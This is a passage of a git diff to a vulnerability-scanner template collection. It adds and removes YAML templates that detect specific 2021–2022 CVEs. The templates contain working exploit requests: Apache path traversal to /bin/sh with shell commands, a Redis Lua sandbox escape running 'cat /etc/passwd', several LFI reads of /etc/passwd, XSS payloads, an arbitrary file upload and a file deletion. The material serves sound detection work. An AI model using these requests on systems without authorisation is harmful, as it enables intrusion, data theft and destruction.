attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773. + reference: + - https://httpd.apache.org/security/vulnerabilities_24.html + - https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d + - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 + - https://twitter.com/itsecurityco/status/1446136957117943815 + remediation: Upgrade to Apache HTTP Server 2.4.51 or later. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-42013 + cwe-id: CWE-22 + tags: cve,cve2021,lfi,apache,rce,misconfig,traversal + +requests: + - raw: + - |+ + GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - |+ + POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + echo Content-Type: text/plain; echo; echo 31024-1202-EVC | rev + + unsafe: true + matchers-condition: or + matchers: + + - type: regex + name: LFI + regex: + - "root:.*:0:0:" + + - type: word + name: RCE + words: + - "CVE-2021-42013" + +# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2021/cve-2021-42551.yaml b/nuclei-templates/CVE-2021/cve-2021-42551.yaml new file mode 100644 index 0000000000..020ace78d8 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-42551.yaml @@ -0,0 +1,49 @@ +id: CVE-2021-42551 + +info: + name: NetBiblio WebOPAC - Reflected Cross-Site Scripting + author: compr00t + severity: medium + description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42551 + - https://www.redguard.ch/advisories/netbiblio_webopac.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-42551 + cwe-id: CWE-79 + tags: cve,cve2021,xss,netbiblio + +requests: + - method: GET + path: + - '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x' + - '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F' + + redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SearchTerm: 'x'+alert(1)+'x'," + - "SearchTerm: 'x\\\\'+alert(1),//'," + condition: or + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "NetBiblio" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/27 diff --git a/nuclei-templates/CVE-2021/cve-2021-42565.yaml b/nuclei-templates/CVE-2021/cve-2021-42565.yaml new file mode 100644 index 0000000000..bd4c2bc4c6 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-42565.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-42565 + +info: + name: myfactory FMS - Reflected Cross-Site Scripting + author: madrobot + severity: medium + description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42565 + - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms + - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-42565 + cwe-id: CWE-79 + tags: cve,cve2021,myfactory,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "" + condition: and + + - type: word + part: header + words: + - "text/html" + +# Enhanced by mp on 2022/02/27 diff --git a/nuclei-templates/CVE-2021/CVE-2021-43496.yaml b/nuclei-templates/CVE-2021/cve-2021-43496.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-43496.yaml rename to nuclei-templates/CVE-2021/cve-2021-43496.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-44529.yaml b/nuclei-templates/CVE-2021/cve-2021-44529.yaml new file mode 100644 index 0000000000..2a56a93b6f --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-44529.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-44529 + +info: + name: Ivanti EPM Cloud Services Appliance Code Injection + author: duty_1g,phyr3wall,Tirtha + severity: critical + description: Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody). + reference: + - https://forums.ivanti.com/s/article/SA-2021-12-02 + - https://twitter.com/Dinosn/status/1505273954478530569 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44529 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-44529 + cwe-id: CWE-94 + metadata: + shodan-query: title:"LANDesk(R) Cloud Services Appliance" + tags: cve,cve2021,ivanti,epm,csa,injection + +requests: + - raw: + - | + GET /client/index.php HTTP/1.1 + Host: {{Hostname}} + Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=; + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "phpinfo()" + - "Cloud Services Appliance" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-45043.yaml b/nuclei-templates/CVE-2021/cve-2021-45043.yaml new file mode 100644 index 0000000000..407b0f617e --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-45043.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-45043 + +info: + name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion + author: Momen Eldawakhly,Evan Rubinstein + severity: high + description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-45043 + - https://www.exploit-db.com/exploits/50588 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45043 + - https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-45043 + cwe-id: CWE-22 + metadata: + google-dork: intitle:"HD-Network Real-time Monitoring System V2.0" + tags: cve,cve2021,hdnetwork,lfi,iot,camera + +requests: + - raw: + - | + GET /language/lang HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype= + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-45092.yaml b/nuclei-templates/CVE-2021/cve-2021-45092.yaml new file mode 100644 index 0000000000..60a13263b4 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-45092.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-45092 + +info: + name: Thinfinity Iframe Injection + author: danielmofer + severity: critical + description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter. + reference: + - https://github.com/cybelesoft/virtualui/issues/2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44848 + - https://www.tenable.com/cve/CVE-2021-45092 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-45092 + cwe-id: CWE-74 + tags: cve,cve2021,injection,iframe,thinfinity + +requests: + - method: GET + path: + - "{{BaseURL}}/lab.html?vpath=//example.com" + + matchers: + - type: regex + regex: + - ".*vpath.*" + - "thinfinity" + condition: and + +# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-45380.yaml b/nuclei-templates/CVE-2021/cve-2021-45380.yaml new file mode 100644 index 0000000000..70cea0b272 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-45380.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-45380 + +info: + name: AppCMS - Reflected Cross-Site Scripting + author: pikpikcu + severity: medium + description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php. + reference: + - https://github.com/source-trace/appcms/issues/8 + - https://nvd.nist.gov/vuln/detail/CVE-2021-45380 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-45380 + cwe-id: CWE-79 + tags: cve,cve2021,appcms,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"">' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-45428.yaml b/nuclei-templates/CVE-2021/cve-2021-45428.yaml deleted file mode 100644 index ec30ef8f6c..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-45428.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2021-45428 - -info: - name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload - author: gy741 - severity: critical - description: | - TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. - reference: - - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing - - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-45428 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-45428 - cwe-id: CWE-639 - metadata: - shodan-query: http.html:"TLR-2005KSH" - verified: "true" - tags: cve,cve2021,telesquare,intrusive,fileupload,packetstorm - -requests: - - raw: - - | - GET /{{randstr}}.txt HTTP/1.1 - Host: {{Hostname}} - - - | - PUT /{{randstr}}.txt HTTP/1.1 - Host: {{Hostname}} - - CVE-2021-45428 - - - | - GET /{{randstr}}.txt HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'status_code_1 == 404 && status_code_2 == 201' - - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200' - condition: and - -# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2021/cve-2021-45968.yaml b/nuclei-templates/CVE-2021/cve-2021-45968.yaml new file mode 100644 index 0000000000..ca513acd7e --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-45968.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-45968 + +info: + name: Pascom CPS Path Traversal + author: dwisiswant0 + severity: high + description: | + Pascom version packaged with Cloud Phone System (CPS) + versions before 7.20 contains a known path traversal issue + reference: + - https://kerbit.io/research/read/blog/4 + - https://www.pascom.net/doc/en/release-notes/ + - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-45968 + cwe-id: CWE-22 + tags: cve,cve2021,pascom,lfi + +requests: + - raw: + - | + GET /services/pluginscript/ HTTP/1.1 + Host: {{Hostname}} + + - | # Double parent to access CMS index + GET /services/pluginscript/..;/..;/ HTTP/1.1 + Host: {{Hostname}} + + - | # Verifying CMS + GET / HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_2 != status_code_1" + - "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS + condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-46379.yaml b/nuclei-templates/CVE-2021/cve-2021-46379.yaml new file mode 100644 index 0000000000..d27fe97f68 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-46379.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-46379 + +info: + name: D-Link DIR850 ET850-1.08TRb03 - Open Redirect + author: 0x_Akoko + severity: medium + description: DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to untrusted site. + reference: + - https://www.opencve.io/cve/CVE-2021-46379 + - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view + - https://www.cvedetails.com/cve/CVE-2021-46379 + - https://www.dlink.com/en/security-bulletin/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-46379 + cwe-id: CWE-601 + metadata: + verified: "true" + tags: cve,cve2021,redirect,dlink,router + +requests: + - method: GET + path: + - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2021/cve-2021-46387.yaml b/nuclei-templates/CVE-2021/cve-2021-46387.yaml new file mode 100644 index 0000000000..1b5473b83f --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-46387.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-46387 + +info: + name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting + author: DhiyaneshDk + severity: medium + description: ZyXEL ZyWALL 2 Plus Internet Security Appliance is affected by Cross Site Scripting (XSS). Insecure URI handling leads to bypass security restriction to achieve Cross Site Scripting, which allows an attacker able to execute arbitrary JavaScript codes to perform multiple attacks such as clipboard hijacking and session hijacking. + reference: + - https://www.exploit-db.com/exploits/50797 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46387 + - https://www.zyxel.com/us/en/support/security_advisories.shtml + - https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-46387 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"Zywall2Plus" + tags: cve,cve2021,xss,zyxel + +requests: + - method: GET + path: + - '{{BaseURL}}/Forms/rpAuth_1?id=
' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '
' + - 'Entry Error' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-46424.yaml b/nuclei-templates/CVE-2021/cve-2021-46424.yaml new file mode 100644 index 0000000000..2b6d737b8a --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-46424.yaml @@ -0,0 +1,44 @@ +id: CVE-2021-46424 + +info: + name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete + author: gy741 + severity: critical + description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request. + reference: + - https://dl.packetstormsecurity.net/2205-exploits/tlr2005ksh-filedelete.txt + - https://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing + - http://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-46424 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2021-46424 + cwe-id: CWE-306 + metadata: + shodan-query: http.html:"TLR-2005KSH" + verified: "true" + tags: cve,cve2021,telesquare,intrusive,packetstorm + +requests: + - raw: + - | + GET /images/icons_title.gif HTTP/1.1 + Host: {{Hostname}} + + - | + DELETE /images/icons_title.gif HTTP/1.1 + Host: {{Hostname}} + + - | + GET /images/icons_title.gif HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404" + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0148.yaml b/nuclei-templates/CVE-2022/CVE-2022-0148.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-0148.yaml rename to nuclei-templates/CVE-2022/CVE-2022-0148.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-0165.yaml b/nuclei-templates/CVE-2022/CVE-2022-0165.yaml deleted file mode 100644 index a8ed3c52f2..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0165.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2022-0165 -info: - name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect - author: akincibor - severity: high - description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). - reference: - - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb - - https://nvd.nist.gov/vuln/detail/CVE-2022-0165 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2022-0165 - cwe-id: CWE-601 - tags: cve,cve2022,wp-plugin,redirect,wordpress,wp -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh" - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0201.yaml b/nuclei-templates/CVE-2022/CVE-2022-0201.yaml deleted file mode 100644 index fa91598350..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0201.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2022-0201 -info: - name: WordPress Permalink Manager < 2.2.15 - Reflected Cross-Site Scripting - author: Akincibor - severity: medium - description: The plugins do not sanitise and escape query parameters before outputting them back in the debug page, leading to a Reflected Cross-Site Scripting issue. - reference: - - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4 - - https://plugins.trac.wordpress.org/changeset/2656512 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0201 - cwe-id: CWE-79 - tags: cve,cve2022,xss,wordpress,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'pm_query' - condition: and - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2022/cve-2022-0271.yaml b/nuclei-templates/CVE-2022/CVE-2022-0271.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-0271.yaml rename to nuclei-templates/CVE-2022/CVE-2022-0271.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-0288.yaml b/nuclei-templates/CVE-2022/CVE-2022-0288.yaml new file mode 100644 index 0000000000..7023ac1948 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0288.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-0288 +info: + name: Ad Inserter < 2.7.10 - Reflected Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. + remediation: Fixed in version 2.7.12 + reference: + - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2022-0288 + cwe-id: CWE-79 + tags: cve,cve2022,wordpress,xss +requests: + - method: POST + path: + - "{{BaseURL}}" + headers: + Content-Type: "application/x-www-form-urlencoded" + body: | + html_element_selection= + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "" + - "ad-inserter" + condition: and + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2022/CVE-2022-0422.yaml b/nuclei-templates/CVE-2022/CVE-2022-0422.yaml new file mode 100644 index 0000000000..3e2de9127d --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0422.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-0422 +info: + name: WordPress White Label MS < 2.2.9 - Reflected Cross-Site Scripting + author: random-robbie + severity: medium + description: The plugin does not sanitise and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing, leading to a Reflected Cross-Site Scripting issue back in the response, leading to reflected cross-site scripting. + reference: + - https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0422 + - https://plugins.trac.wordpress.org/changeset/2672615 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0422 + cwe-id: CWE-79 + tags: cve,cve2022,wordpress,xss,wp-plugin +requests: + - raw: + - | + POST /wp-login.php?wlcms-action=preview HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B + matchers-condition: and + matchers: + - type: word + part: body + words: + - "alert(/XSS/);" + - type: word + part: body + words: + - "wlcms-login-wrapper" + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0482.yaml b/nuclei-templates/CVE-2022/CVE-2022-0482.yaml deleted file mode 100644 index 7ee41afa5e..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0482.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2022-0482 - -info: - name: Easy!Appointments <1.4.3 - Broken Access Control - author: francescocarlucci,opencirt - severity: critical - description: | - Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments. - reference: - - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/ - - https://github.com/alextselegidis/easyappointments - - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0482 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.1 - cve-id: CVE-2022-0482 - cwe-id: CWE-863 - tags: cve,cve2022,easyappointments,huntr - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01 - - extractors: - - type: kval - part: header - name: csrf_token - kval: - - "csrfCookie" - internal: true - - cookie-reuse: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"appointments":' - - '"unavailables":' - condition: and - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0540.yaml b/nuclei-templates/CVE-2022/CVE-2022-0540.yaml deleted file mode 100644 index 21d2d6f4d3..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0540.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2022-0540 -info: - name: Atlassian Jira Seraph - Authentication Bypass - author: DhiyaneshDK - severity: critical - description: | - Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. - reference: - - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 - - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-0540 - cwe-id: CWE-287 - metadata: - shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2022,atlassian,jira,exposure,auth-bypass -requests: - - method: GET - path: - - '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'General Insight Configuration' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0543.yaml b/nuclei-templates/CVE-2022/CVE-2022-0543.yaml deleted file mode 100644 index 00d78f467c..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0543.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2022-0543 -info: - name: Redis Sandbox Escape - Remote Code Execution - author: dwisiswant0 - severity: critical - description: | - This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The - vulnerability was introduced by Debian and Ubuntu Redis packages that - insufficiently sanitized the Lua environment. The maintainers failed to - disable the package interface, allowing attackers to load arbitrary libraries. - reference: - - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - - https://bugs.debian.org/1005787 - - https://www.debian.org/security/2022/dsa-5081 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2022-0543 - metadata: - shodan-query: redis_version - tags: cve,cve2022,network,redis,unauth,rce,kev -network: - - inputs: - - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" - host: - - "{{Hostname}}" - - "{{Host}}:6379" - read-size: 64 - matchers: - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0591.yaml b/nuclei-templates/CVE-2022/CVE-2022-0591.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-0591.yaml rename to nuclei-templates/CVE-2022/CVE-2022-0591.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-0653.yaml b/nuclei-templates/CVE-2022/CVE-2022-0653.yaml new file mode 100644 index 0000000000..e06a6c604a --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0653.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-0653 + +info: + name: Wordpress Profile Builder Plugin Cross-Site Scripting + author: dhiyaneshDk + severity: medium + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 + - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/ + tags: cve,cve2022,wordpress,xss,wp-plugin + description: "The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n." + remediation: Upgrade to version 3.6.5 or later. + classification: + cve-id: CVE-2022-0653 + +requests: + - method: GET + path: + - 